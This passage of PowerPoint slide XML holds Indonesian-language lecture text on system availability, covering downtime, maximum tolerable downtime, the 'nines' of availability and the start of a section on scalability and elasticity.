              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persentase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persentase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (downtime). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditoleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MTD) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>longgar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 24x7 (24 jam per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>minggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 24x365 (24 jam per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, 365 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sembilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sembilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (99%) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enam-sembilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (99,9999%). Bagan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diwakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh masing-masing "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sembilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Waktu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> interval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direncanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di Tingkat server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Elastisitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Properti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastisitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> guna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rasio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlipat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
